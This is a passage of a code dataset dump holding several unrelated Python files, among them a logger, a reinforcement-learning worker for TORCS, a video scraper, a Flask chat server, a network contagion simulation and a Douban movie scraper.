logging\r\nfrom constants import LOG_DIR\r\n\r\n\r\n\r\n\r\nclass Logger:\r\n '''\r\n Custom Logger\r\n '''\r\n\r\n def __init__(self, dir=LOG_DIR, name='cleaner_logger'):\r\n '''\r\n Setuping the Logging object\r\n '''\r\n\r\n \r\n # Try to create the path to the Log file\r\n try:\r\n # Going back a folder\r\n log_folder = os.path.abspath(os.path.join(dir, \"..\"))\r\n \r\n os.makedirs(log_folder)\r\n\r\n # If the path exists\r\n except FileExistsError:\r\n pass\r\n\r\n\r\n\r\n # Delete the previous Log file\r\n try:\r\n os.remove(dir)\r\n \r\n # If it does not exist, create it\r\n except FileNotFoundError:\r\n open(dir, 'w')\r\n\r\n\r\n\r\n self.logger = logging.getLogger(name)\r\n self.logger.setLevel(logging.DEBUG)\r\n\r\n # F I L E H A N D L I N G\r\n #####################################################################################\r\n # The path to the current file\r\n curr_dir_path = os.path.dirname(os.path.abspath(__file__))\r\n\r\n # Creating the File Handler for the Logging\r\n f_handler = logging.FileHandler(os.path.join(curr_dir_path, dir))\r\n #####################################################################################\r\n\r\n\r\n # F O R M A T T I N G H A N D L I N G\r\n #####################################################################################\r\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\r\n f_handler.setFormatter(formatter)\r\n #####################################################################################\r\n\r\n # Adding the Formatted File Handler to the Logging object\r\n self.logger.addHandler(f_handler)\r\n\r\n def add(self, string):\r\n self.logger.debug(str(string))\r\n\r\n","sub_path":"Cleaner/output/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"300891127","text":"import numpy as np\nimport tensorflow as tf\nfrom env_wrapper import TorcsWrapper\nfrom utils import update_target_graph, discount\nfrom network import Network\n\nclass Worker():\n def __init__(self, index, name, state_size, action_size, trainer, model_path, global_episodes):\n self.name = \"worker_\" + str(name)\n self.number = name\n self.model_path = model_path\n self.trainer = trainer\n self.global_episodes = global_episodes\n self.increment = self.global_episodes.assign_add(1)\n self.episode_rewards = []\n self.episode_lengths = []\n self.episode_mean_values = []\n self.summary_writer = tf.summary.FileWriter(\"train_\" + str(self.number))\n\n # Local network\n self.local_network = Network(state_size, action_size, self.name, trainer)\n\n # Update operations\n self.update_local_ops = update_target_graph('global', self.name)\n\n # # The Below code is related to setting up the Doom environment\n # game.set_doom_scenario_path(\"basic.wad\") # This corresponds to the simple task we will pose our agent\n # game.set_doom_map(\"map01\")\n # game.set_screen_resolution(ScreenResolution.RES_160X120)\n # game.set_screen_format(ScreenFormat.GRAY8)\n # game.set_render_hud(False)\n # game.set_render_crosshair(False)\n # game.set_render_weapon(True)\n # game.set_render_decals(False)\n # game.set_render_particles(False)\n # game.add_available_button(Button.MOVE_LEFT)\n # game.add_available_button(Button.MOVE_RIGHT)\n # game.add_available_button(Button.ATTACK)\n # game.add_available_game_variable(GameVariable.AMMO2)\n # game.add_available_game_variable(GameVariable.POSITION_X)\n # game.add_available_game_variable(GameVariable.POSITION_Y)\n # game.set_episode_timeout(300)\n # game.set_episode_start_time(10)\n # game.set_window_visible(False)\n # game.set_sound_enabled(False)\n # game.set_living_reward(-1)\n # game.set_mode(Mode.PLAYER)\n # game.init()\n # self.actions = self.actions = np.identity(a_size, dtype=bool).tolist() # ?\n # End Doom set-up\n self.env = TorcsWrapper(port=3101+index)\n\n def train(self, rollout, sess, gamma, bootstrap_value):\n rollout = np.array(rollout)\n observations = np.asarray([ _ for _ in rollout[:, 0]])\n actions = rollout[:, 1]\n rewards = rollout[:, 2]\n next_observations = np.asarray([ _ for _ in rollout[:, 3]])\n values = rollout[:, 5]\n\n # Here we take the rewards and values from the rollout, and use them to\n # generate the advantage and discounted returns.\n # The advantage function uses \"Generalized Advantage Estimation\"\n self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])\n discounted_rewards = discount(self.rewards_plus, gamma)[:-1]\n self.value_plus = np.asarray(values.tolist() + [bootstrap_value])\n advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]\n advantages = discount(advantages, gamma)\n\n # Update the global network using gradients from loss\n # Generate network statistics to periodically save\n feed_dict = {self.local_network.target_v: discounted_rewards,\n self.local_network.state_input: observations,\n self.local_network.actions: actions,\n self.local_network.advantages: advantages,\n self.local_network.state_in[0]: self.batch_rnn_state[0],\n self.local_network.state_in[1]: self.batch_rnn_state[1]}\n v_l, p_l, e_l, g_n, v_n, self.batch_rnn_state, _ = sess.run([self.local_network.value_loss,\n self.local_network.policy_loss,\n self.local_network.entropy,\n self.local_network.grad_norms,\n self.local_network.var_norms,\n self.local_network.state_out,\n self.local_network.apply_grads],\n feed_dict=feed_dict)\n return v_l / len(rollout), p_l / len(rollout), e_l / len(rollout), g_n, v_n\n\n def work(self, max_steps, max_steps_per_episode, max_episodes, gamma, sess, coord, saver):\n try:\n episodes = sess.run(self.global_episodes)\n total_steps = 0\n print(\"Starting worker \" + str(self.number))\n with sess.as_default(), sess.graph.as_default():\n while not coord.should_stop():\n if episodes >= max_episodes:\n break\n\n sess.run(self.update_local_ops)\n episode_buffer = []\n episode_values = []\n # episode_frames = []\n episode_reward = 0\n steps_per_episode = 0\n\n state_t = self.env.reset()\n # s = self.env.get_state().screen_buffer\n # episode_frames.append(s)\n # s = process_frame(s)\n rnn_state = self.local_network.state_init\n self.batch_rnn_state = rnn_state\n while steps_per_episode < max_steps_per_episode:\n # Take an action using probabilities from policy network output.\n actor_policy, critic_value, rnn_state = sess.run(\n [self.local_network.policy, self.local_network.value, self.local_network.state_out],\n feed_dict={self.local_network.state_input: [state_t],\n self.local_network.state_in[0]: rnn_state[0],\n self.local_network.state_in[1]: rnn_state[1]})\n\n if np.random.random() < 0.2:\n a = np.random.randint(0, 5)\n else:\n a = np.argmax(actor_policy[0])\n\n state_t1, reward, done = self.env.step(a)\n print(\"%s, Step=%d, Action=%d\" % (self.name, steps_per_episode, a))\n # if done == False:\n # episode_frames.append(s1)\n # s1 = process_frame(s1)\n # else:\n # s1 = s\n\n episode_buffer.append([state_t, a, reward, state_t1, done, critic_value[0, 0]])\n episode_values.append(critic_value[0, 0])\n\n episode_reward += reward\n state_t = state_t1\n total_steps += 1\n steps_per_episode += 1\n\n # If the episode hasn't ended, but the experience buffer is full, then we\n # make an update step using that experience rollout.\n if len(episode_buffer) == 30 and done == False and steps_per_episode != max_steps_per_episode - 1:\n # Since we don't know what the true final return is, we \"bootstrap\" from our current\n # value estimation.\n v1 = sess.run(self.local_network.value,\n feed_dict={self.local_network.state_input: [state_t],\n self.local_network.state_in[0]: rnn_state[0],\n self.local_network.state_in[1]: rnn_state[1]})[0, 0]\n v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, v1)\n episode_buffer = []\n sess.run(self.update_local_ops)\n if done == True:\n break\n\n self.episode_rewards.append(episode_reward)\n self.episode_lengths.append(steps_per_episode)\n self.episode_mean_values.append(np.mean(episode_values))\n\n # Update the network using the episode buffer at the end of the episode.\n if len(episode_buffer) > 0:\n v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, 0.0)\n\n # # Periodically save gifs of episodes, model parameters, and summary statistics.\n # if episode_count % 5 == 0 and episode_count != 0:\n # if self.name == 'worker_0' and episode_count % 25 == 0:\n # time_per_step = 0.05\n # images = np.array(episode_frames)\n # make_gif(images, './frames/image' + str(episode_count) + '.gif',\n # duration=len(images) * time_per_step, true_image=True, salience=False)\n # if episode_count % 250 == 0 and self.name == 'worker_0':\n # saver.save(sess, self.model_path + '/model-' + str(episode_count) + '.cptk')\n # print(\"Saved Model\")\n #\n # mean_reward = np.mean(self.episode_rewards[-5:])\n # mean_length = np.mean(self.episode_lengths[-5:])\n # mean_value = np.mean(self.episode_mean_values[-5:])\n # summary = tf.Summary()\n # summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))\n # summary.value.add(tag='Perf/Length', simple_value=float(mean_length))\n # summary.value.add(tag='Perf/Value', simple_value=float(mean_value))\n # summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))\n # summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))\n # summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))\n # summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))\n # summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))\n # self.summary_writer.add_summary(summary, episode_count)\n #\n # self.summary_writer.flush()\n\n if self.name == 'worker_0':\n sess.run(self.increment)\n\n episodes += 1\n finally:\n self.env.end()","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52854136","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\nimport time\nimport os\nimport concurrent.futures\nimport json\nfrom urllib.parse import unquote\n\n\nmainURL = \"https://anime1.me/category/2020%e5%b9%b4%e5%86%ac%e5%ad%a3/%e9%ad%94%e6%b3%95%e7%b4%80%e9%8c%84-%e9%ad%94%e6%b3%95%e5%b0%91%e5%a5%b3%e5%b0%8f%e5%9c%93%e5%a4%96%e5%82%b3\"\napiURL = \"https://v.anime1.me/api\"\n\nheaders = {\n \"Referer\": '',\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.47\",\n \"Origin\": \"https://v.anime1.me\"\n}\n\n\nvideoHeader = {\n \"Referer\": 'https://v.anime1.me/',\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.47\",\n \"Cookie\": \"\"\n}\n\n\nforms = {\n \"d\": \"\"\n}\n\n\ndef thread(session, middleURL):\n videoTitle = \"\"\n ss = session.post(middleURL)\n videoSoup = BeautifulSoup(ss.content, \"lxml\")\n mainScript = videoSoup.findAll(\"script\")[-1].string\n\n str = mainScript.split(\n \"p.setup({\")[-1].split(\"});\")[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n\n while True:\n arr = str.split(\":\", 1)\n val = arr[-1].split(\",\", 1)\n\n if arr[0] == \"title\":\n videoTitle = val[0].replace(\"\\\"\", \"\").replace(\"\\'\", \"\")\n break\n str = val[-1]\n\n d = unquote(mainScript.split(\n \"x.send('d=\")[-1].split(\"');\")[0].replace(\"\\n\", \"\").replace(\" \", \"\"))\n\n forms[\"d\"] = d\n headers[\"Referer\"] = middleURL\n\n try:\n with requests.Session() as newSession:\n getVideoURL = newSession.post(apiURL, data=forms, headers=headers)\n videoHeader[\"Cookie\"] = json.dumps(getVideoURL.cookies.get_dict()).split(\n \"{\", 1)[-1].split(\"}\", 1)[0].replace(\"\\\"\", \"\").replace(\" \", \"\").replace(\",\", \"; \").replace(\":\", \"=\")\n urlObj = json.loads(getVideoURL.content)\n time.sleep(10)\n videoContent = newSession.get(\n \"https:\"+urlObj['l'], headers=videoHeader)\n\n if videoContent.status_code == 200:\n print(videoTitle, \" 成功\")\n with open(\"./videos/\"+videoTitle+\".mp4\", 'wb') as f:\n f.write(videoContent.content)\n f.close()\n\n print(\"the header is \", videoHeader)\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\")\n else:\n print(\"FAILED!!!!!!!\")\n print(\"the title is \", videoTitle)\n print(\"the header is \", videoHeader)\n print(\"the url is \", \"https:\"+urlObj['l'])\n print(\"the code is \", videoContent)\n print(\"\\n\\n\\n\\n\")\n\n except Exception as e:\n print(e)\n\n\ndef pool(session, middleURLs):\n with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:\n all_task = [executor.submit(thread, session, middleURL)\n for middleURL in middleURLs]\n wait(all_task, return_when=ALL_COMPLETED)\n\n\ndef scraper():\n with requests.Session() as s:\n res = s.get(mainURL)\n soup = BeautifulSoup(res.content, \"lxml\")\n iframes = soup.findAll(\"iframe\", {\"class\": \"vframe\"})\n middleURLs = list(map(lambda iframe: iframe[\"src\"], iframes))\n # if 上一頁的話就要在往下找\n\n pool(session=s, middleURLs=middleURLs)\n\n\ndef cls(): return os.system('cls')\n\n\ndef main():\n # cls()\n scraper()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"147894972","text":"import random\r\ncomputer = random.randint(0, 2)\r\nplayer = int(input(\"请输入【石头(0)、剪刀(1)、布(2)】:\"))\r\nif 0 <= player <= 2:\r\n if (((player == 0) and (computer == 1)) or\r\n ((player == 1) and (computer == 2)) or\r\n ((player == 2) and (computer == 0))):\r\n print(\"玩家获胜,恭喜!\")\r\n elif player == computer:\r\n print(\"平手!\")\r\n else:\r\n print(\"玩家输了,再接再厉!\")\r\nelse:\r\n print(\"输入错误\")\r\n","sub_path":"Python/if-else和if-elif-else.py","file_name":"if-else和if-elif-else.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"400607948","text":"#!/usr/bin/env python\n'''\ntests.controller.test_platform_controller\n\nTest for the platform controller\n'''\nimport json\nfrom ooiservices.app import app\nfrom tests.services_test_case import ServicesTestCase\n\nclass TestPlatformController(ServicesTestCase):\n def setUp(self):\n '''\n Initializes the application\n '''\n ServicesTestCase.setUp(self)\n app.config['TESTING'] = True\n self.app = app.test_client()\n \n def test_platform_listing(self):\n '''\n Test that the app context initializes successfully\n '''\n rv = self.app.get('/platforms')\n json.loads(rv.data) # Assert data is JSON\n with open('tests/controller/expected_platforms.json', 'r') as f:\n expected = f.read()\n\n assert expected == rv.data\n\n","sub_path":"tests/controller/test_platform_controller.py","file_name":"test_platform_controller.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"522187664","text":"import random\nimport math\nfrom enum import Enum\nimport networkx as nx\n\nfrom mesa import Agent, Model\nfrom mesa.time import RandomActivation\nfrom mesa.datacollection import DataCollector\nfrom mesa.space import NetworkGrid\n\nclass State(Enum):\n SUSCEPTIBLE, INACTIVE, ACTIVE, REMOVED = range(4)\n\ndef number_state(model, state):\n return sum([1 for a in model.grid.get_all_cell_contents() if a.state is state])\n\ndef number_susceptible(model):\n return number_state(model, State.SUSCEPTIBLE)\n\ndef number_inactive(model):\n return number_state(model, State.INACTIVE)\n\ndef number_active(model):\n return number_state(model, State.ACTIVE)\n\ndef number_removed(model):\n return number_state(model, State.REMOVED)\n\n# def infective_clustering(model):\n# infective=0\n# G=model.G\n# for v in G.nodes:\n# x=model.grid.get_cell_list_contents(v)\n# if x.state == State.ACTIVE:\n# neighbors=model.grid.get_cell_list_contents(G.neighbors(v))\n# for u in neighbors:\n# if u.state == State.ACTIVE:\n# infective+=1\n# return infective\n\n\nclass VirusModel(Model):\n\n def __init__(self, num_nodes, avg_node_degree, prob_rewire, initial_outbreak_size, alpha, beta, gamma, k, n):\n\n self.num_nodes = num_nodes\n self.avg_node_degree = avg_node_degree\n self.prob_rewire=prob_rewire\n self.G = nx.watts_strogatz_graph(n=self.num_nodes,k=avg_node_degree,p=prob_rewire)\n # self.G = nx.erdos_renyi_graph(n=self.num_nodes, p=prob)\n self.grid = NetworkGrid(self.G)\n self.schedule = RandomActivation(self)\n self.initial_outbreak_size = initial_outbreak_size if initial_outbreak_size <= num_nodes else num_nodes\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n self.k=k\n self.n=n\n\n # Create agents\n for i, node in enumerate(self.G.nodes()):\n a = VirusAgent(i, self, State.SUSCEPTIBLE, self.alpha, self.beta, self.gamma, self.k, self.n)\n self.schedule.add(a)\n # Add the agent to the node\n self.grid.place_agent(a, node)\n\n # Infect some nodes\n active_nodes = random.sample(self.G.nodes(), self.initial_outbreak_size)\n for a in self.grid.get_cell_list_contents(active_nodes):\n a.state = State.ACTIVE\n\n self.datacollector = DataCollector(\n model_reporters={\n \"Infected\": number_active,\n \"Susceptible\": number_susceptible,\n \"Carrier\": number_inactive,\n \"Removed\": number_removed\n # \"Active Clustering\": infective_clustering,\n }\n )\n\n self.running = True\n self.datacollector.collect(self)\n\n def removed_susceptible_ratio(self):\n try:\n return number_state(self, State.REMOVED) / number_state(self, State.SUSCEPTIBLE)\n except ZeroDivisionError:\n return math.inf\n\n def step(self):\n self.schedule.step()\n self.datacollector.collect(self)\n\n def run_model(self, n):\n for i in range(n):\n self.step()\n\n\nclass VirusAgent(Agent):\n def __init__(self, unique_id, model, initial_state, alpha, beta, gamma, k, n):\n super().__init__(unique_id, model)\n\n self.state = initial_state\n\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n self.k = k\n self.n = n\n\n def try_to_infect_neighbors(self):\n neighbors_nodes = self.model.grid.get_neighbors(self.pos, include_center=False)\n susceptible_neighbors = [agent for agent in self.model.grid.get_cell_list_contents(neighbors_nodes) if\n agent.state is State.SUSCEPTIBLE]\n for a in susceptible_neighbors:\n if random.random() < self.beta:\n a.state = State.INACTIVE\n\n def try_become_active(self):\n neighbors_nodes = self.model.grid.get_neighbors(self.pos, include_center=False)\n active_neighbors = [agent for agent in self.model.grid.get_cell_list_contents(neighbors_nodes) if\n agent.state is State.ACTIVE]\n num_active_neighbors=len(active_neighbors)\n # prop_active_neighbors = active_neighbors/neighbors_nodes\n x=random.random()\n y = (-((self.k**(-self.n))*(x-1))/x)**(-1/self.n)\n if y < num_active_neighbors:\n self.state = State.ACTIVE\n\n def try_gain_resistance(self):\n if random.random() < self.alpha:\n self.state = State.REMOVED\n\n def step(self):\n if self.state is State.ACTIVE:\n self.try_to_infect_neighbors()\n self.try_gain_resistance()\n # self.try_become_inactive()\n elif self.state is State.INACTIVE:\n self.try_become_active()","sub_path":"Code/revolution-abms/revolution-on-network-ws/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"77055948","text":"import numpy as np\nimport sys\nimport os\nfrom matplotlib import pyplot as plt\nimport pickle\nfrom swellex.audio.config import get_proj_tones\nfrom swellex.audio.lse import get_doppler_est_pickle_name, AlphaEst\nfrom scipy.interpolate import interp1d\n\n'''\nDescription:\nRoutines to look at the phase estimates\nfor the various projects\n\nDate: \n10/21\n\nAuthor: Hunter Akins\n\nInstitution: UC San Diego, Scripps Institution of Oceanography\n\n'''\n\n\ndef get_local_pickle_dir(proj_str):\n proj_root = 'pickles/' + proj_str + '/'\n return proj_root\n\ndef copy_pests(proj_str):\n freqs = get_proj_tones(proj_str)\n for freq in freqs:\n pickle_loc = get_doppler_est_pickle_name(freq, proj_string=proj_str)\n ssh_root = 'fakins@tscc-login.sdsc.edu:'\n local_spot = get_local_pickle_dir(proj_str)\n os.system('scp ' + ssh_root + pickle_loc + ' ' + local_spot)\n\ndef get_local_name(freq, proj_str):\n pickle_loc = get_doppler_est_pickle_name(freq, proj_string=proj_str)\n i = len(pickle_loc)-1\n while pickle_loc[i] != '/':\n i -= 1\n i += 1\n pname = pickle_loc[i:]\n pdir = get_local_pickle_dir(proj_str)\n return pdir + pname\n \ndef load_pest(freq, proj_str, chunk_len=1024, var=0.1):\n name = get_local_name(freq, proj_str)\n with open(name, 'rb') as f:\n alpha_est = pickle.load(f) \n freqs = np.array(alpha_est.freqs)\n freqs = freqs.reshape(freqs.size)\n num_samps = freqs.size\n t_grid = np.linspace(chunk_len/1500* 0.5, chunk_len/1500 * (num_samps-1) + chunk_len / 1500*0.5,num_samps) \n return t_grid, freqs\n\ndef get_full_freqs(proj_str):\n #tmax = 10*60\n freqs = get_proj_tones(proj_str)\n freqs = [x for x in freqs if x != 388 and x != 166]\n first = True\n for count, f in enumerate(freqs):\n t_grid, f_ests = load_pest(f, proj_str)\n tmax = t_grid[-1]\n if first == True:\n i = 0 \n while t_grid[i] < tmax:\n i += 1\n first = False\n full_freqs = np.zeros((len(freqs), i-1))\n #krs = np.load('../audio/npy_files/' + str(f) + '_krs.npy')\n #kbar = np.mean(krs.real)\n v_est = (f - f_ests)*1500 / f\n full_freqs[count, :] = v_est[1:i]\n\n return t_grid[1:i], full_freqs\n\ndef proc_second():\n c = 1500\n freqs = get_proj_tones('s5_deep_second')\n first = True\n for count, f in enumerate(freqs):\n t_grid, f_ests = load_pest(f, proj_str)\n if first == True:\n full_freqs = np.zeros((len(freqs), t_grid.size))\n first=False\n v_est = (f_ests/f - 1)*c\n full_freqs[count, :] = v_est[:]\n return t_grid, full_freqs\n\ndef make_theta_plots(tgrid, full_vest, freq, proj_str, c=1500):\n \"\"\"\n Look at variability in phase correction\n as function of source frequency phase used \n \"\"\"\n mean_v = np.mean(full_vest, axis=1)\n dev_v = full_vest - mean_v.reshape(mean_v.size, 1)\n dev_f = freq*dev_v/c\n dt = 1024/1500\n theta = np.cumsum(dev_f,axis=1)*2*np.pi*dt\n print(theta.shape)\n fig, axes = plt.subplots(2,1)\n plt.suptitle('Excess phase accumulated due to accelerations for experiment ' + proj_str + ' estimated using the phase from each frequency band in the experiment')\n for i in range(theta.shape[0]):\n axes[0].plot(tgrid/60, theta[i,:] / 2 /np.pi)\n axes[1].plot(tgrid/60, dev_f[i,:])\n axes[1].set_xlabel('Time (min)')\n axes[0].set_ylabel('Excess phase (cycles)')\n axes[1].set_ylabel('Frequency deviation from mean (Hz)')\n\ndef make_range_err(tgrid, full_vest, freq, proj_str, c=1500):\n \"\"\"\n Look at variability in phase correction\n as function of source frequency phase used \n \"\"\"\n mean_v = np.mean(full_vest, axis=1)\n dev_v = full_vest - mean_v.reshape(mean_v.size, 1)\n dt = tgrid[1]-tgrid[0]\n dev_r = np.cumsum(dev_v, axis=1)*dt\n fig = plt.figure()\n plt.suptitle('Range error in assuming a constant velocity')\n for i in range(dev_r.shape[0]):\n plt.plot(tgrid/60, dev_r[i,:])\n plt.ylabel('Excess range (m)')\n\n\n\"\"\"\nproj_str = 's5_deep'\n#copy_pests(proj_str)\nt3, vv3 = get_full_freqs(proj_str)\nplt.plot(t3, vv3[-1,:])\nplt.show()\n\nproj_str = 's5_deep_second'\n#copy_pests(proj_str)\nt, vvf= proc_second()\nplt.figure()\ni = 0\nfor f in get_proj_tones(proj_str):\n if f == 388:\n plt.plot(t[400:-1], vvf[i,400:-1])\n i += 1\nplt.show()\nprint(t[0])\nprint('mean v', np.mean(vvf[:, 400:], axis=1))\nprint('start time', 60*60 + t[400])\nprint('start time min', 60 + t[400]/60)\n\nr = np.cumsum(vvf[-1, 400:-1])\nplt.plot(r)\nplt.show()\n\"\"\"\n\ndef make_single_vel_s5():\n proj_str = 's5_deep_cpa'\n #copy_pests(proj_str)\n t3, vv3 = get_full_freqs(proj_str)\n print('dt1', t3[1]-t3[0])\n t3 += 50*60\n plt.figure()\n proj_str = 's5_deep'\n t1, vv1 = get_full_freqs(proj_str)\n plt.plot(t1/60, vv1[-1,:])\n proj_str = 's5_deep_second'\n #copy_pests(proj_str)\n t2, vv2 = get_full_freqs(proj_str)\n t2 += 64*60\n plt.plot(t2/60, vv2[-1,:])\n t3_inds = [i for i in range(len(t3)) if t3[i] > np.max(t1) and t3[i] < np.min(t2)]\n t3 = t3[t3_inds]\n vv3 = vv3[:,t3_inds]\n plt.plot(t3/60, vv3[-1,:])\n #plt.show()\n\n dt = 4096/1500\n full_grid = list(t1) + list(t3) + list(t2)\n full_grid = np.array(full_grid)\n full_vals = list(vv1[-1,:]) + list(vv3[-1, :]) + list(vv2[-1,:])\n full_vals = np.array(full_vals)\n plt.figure()\n plt.plot(full_grid, full_vals)\n #plt.show()\n desired_grid = np.arange(0+dt/2, np.max(t2), dt)\n interp_f = interp1d(full_grid, full_vals)\n desired_vals = interp_f(desired_grid)\n plt.figure()\n plt.plot(desired_grid/60, desired_vals)\n plt.show()\n thing = np.zeros((2, desired_vals.size))\n thing[0,:] = desired_grid\n thing[1,:] = desired_vals\n np.save('s5_deep_v.npy', thing)\n\n r_vals =np.cumsum(desired_vals)\n plt.figure()\n plt.plot(r_vals)\n plt.show()\n\n #\n\nmake_single_vel_s5()\n","sub_path":"ship/proc_pests.py","file_name":"proc_pests.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"440774407","text":"from flask import Flask, request, abort\r\nimport time\r\nimport datetime\r\nimport json\r\nimport bots\r\n\r\napp = Flask(__name__)\r\n\r\nall_messages = [\r\n {\r\n 'login': 'login',\r\n 'text': 'text',\r\n 'time': time.time()\r\n }\r\n]\r\n\r\n\r\n@app.route(\"/\")\r\ndef server_info():\r\n return \"Server info\"\r\n\r\n\r\n@app.route(\"/status\")\r\ndef status():\r\n names = []\r\n for message in all_messages:\r\n if message['login'] not in names:\r\n names.append(message['login'])\r\n status = {\r\n \"status\": \"true\",\r\n \"name\": \"messanger\",\r\n \"number of members\": len(names),\r\n \"number of messages\": len(all_messages),\r\n \"time\": str(datetime.datetime.fromtimestamp(time.time()).strftime(\"%Y-%m-%d-%H.%M.%S\"))\r\n }\r\n return json.dumps(status)\r\n\r\n\r\n@app.route(\"/send\", methods=['POST'])\r\ndef send_message():\r\n data = request.json\r\n if not isinstance(data, dict):\r\n return abort(400)\r\n if 'login' not in data or 'text' not in data:\r\n return abort(400)\r\n\r\n login = data['login']\r\n text = data['text']\r\n\r\n if not isinstance(login, str) or not isinstance(text, str):\r\n return abort(400)\r\n if not (0 < len(login) < 30):\r\n return abort(400)\r\n if not (0 < len(text) < 100):\r\n return abort(400)\r\n\r\n message = {\r\n 'login': login,\r\n 'text': text,\r\n 'time': time.time()\r\n }\r\n all_messages.append(message)\r\n names = []\r\n for message in all_messages:\r\n if message['login'] not in names:\r\n names.append(message['login'])\r\n server_status = []\r\n server_status.append(len(names))\r\n server_status.append(len(all_messages))\r\n x = bots.check_on_commands(text, login, server_status)\r\n if x != None:\r\n all_messages.append(x)\r\n\r\n return {'ok': True}\r\n\r\n\r\n@app.route(\"/get\")\r\ndef get_messages():\r\n try:\r\n klient_time = float(request.args['after'])\r\n except:\r\n return abort(400)\r\n\r\n return_messages = []\r\n for message in all_messages:\r\n if message['time'] > klient_time:\r\n return_messages.append(message)\r\n return {\"return_messages\": return_messages[:50]}\r\n\r\n\r\napp.run()\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"497314488","text":"import requests\nimport csv\nimport json\nfrom requests.adapters import HTTPAdapter\n\n# def getinfo():\n# # r=requests.get(\"https://douban-api.uieee.com/v2/movie/subject/1764796\")\n# # info=r.text.encode('utf-8').decode('unicode_escape')\n# # file=open(\"info.txt\",\"w\")\n# # file.write(info)\n# # file.close()\n# def makedir():\n# file=open(\"info.txt\",\"r\")\n# str=file.read()\n# dict=json.dumps(str)\n# print(dict)\n#\n# makedir()\ns = requests.Session()\ns.mount('http://', HTTPAdapter(max_retries=3))\ns.mount('https://', HTTPAdapter(max_retries=3))\n\nlistone=[\"id\",\"year\",\"title\",\"reviews_count\",\"wish_count\",\"collect_count\"]\nother=[\"castsid\",\"castsname\",\"directorsid\",\"directorsname\",\"writersid\",\"writersname\"]\nlistlist=[\"tags\",\"pubdates\",\"languages\",\"durations\",\"genres\",\"countries\",\"summary\",\"aka\"]\nspecial=[\"casts\",\"directors\",\"writers\"]\n\nlistact=[\"id\",\"name\",\"name_en\",\"gender\",\"professions\",\"summary\",\"birthday\",\"born_place\"]\ndef writefile(path,num):\n try:\n r=requests.get(path+num)\n except:\n return None\n info=r.text\n dict1=json.loads(info)\n print(\"访问id:\"+num)\n return dict1\n # file=open(\"%d.txt\"%num,\"w\")\n # file.write(str(dict1))\n # file.close()\n\n\ndef readfile(path):\n file=open(path,\"r\")\n info=file.read()\n dict=eval(info)\n return dict\n\nListMovie=listone+listlist\ndef findwhatyouneed(dict):\n idlist = []\n with open(\"movie.csv\", \"a\") as csvfile:\n writer = csv.DictWriter(csvfile,ListMovie+other)\n tempdict={}\n for i in ListMovie:\n tempdict[i]=str(dict[i])\n for i in special:\n namelist=[]\n for j in dict[i]:\n idlist.append(j[\"id\"])\n namelist.append(j[\"name\"])\n tempdict[i+\"id\"]=idlist\n tempdict[i+\"name\"]=namelist\n writer.writerow(tempdict)\n print(\"存储%s信息成功\"%tempdict[\"id\"])\n print(\"查询%s电影的电影人\"%tempdict[\"id\"])\n with open(\"act.csv\", \"a\") as csvfile:\n writer = csv.DictWriter(csvfile,listact)\n actdict={}\n for i in idlist:\n if i==None:\n continue\n print(\"读取id:%s的电影人信息\"%i)\n dictt=writefile(\"https://douban-api.uieee.com/v2/movie/celebrity/\",i)\n if dictt==None:\n continue\n for j in listact:\n actdict[j]=str(dictt[j])\n writer.writerow(actdict)\n\n\ndef getid():\n numlist=[]\n pa={\"count\":\"150\",\"start\": \"0\"}\n print(\"查询近期上映电影\")\n r=requests.get(\"https://douban-api.uieee.com/v2/movie/coming_soon\",params=pa)\n print(\"查询成功\")\n dict=r.json()\n for i in dict[\"subjects\"]:\n print(\"电影id是\"+i[\"id\"])\n numlist.append(i[\"id\"])\n return numlist\n\n\n\nif __name__==\"__main__\":\n with open(\"movie.csv\", \"w\") as csvfile:\n writer = csv.DictWriter(csvfile,ListMovie+other)\n writer.writeheader()\n with open(\"act.csv\", \"w\") as csvfile:\n writer = csv.DictWriter(csvfile,listact)\n writer.writeheader()\n num=getid()\n for i in num:\n try:\n 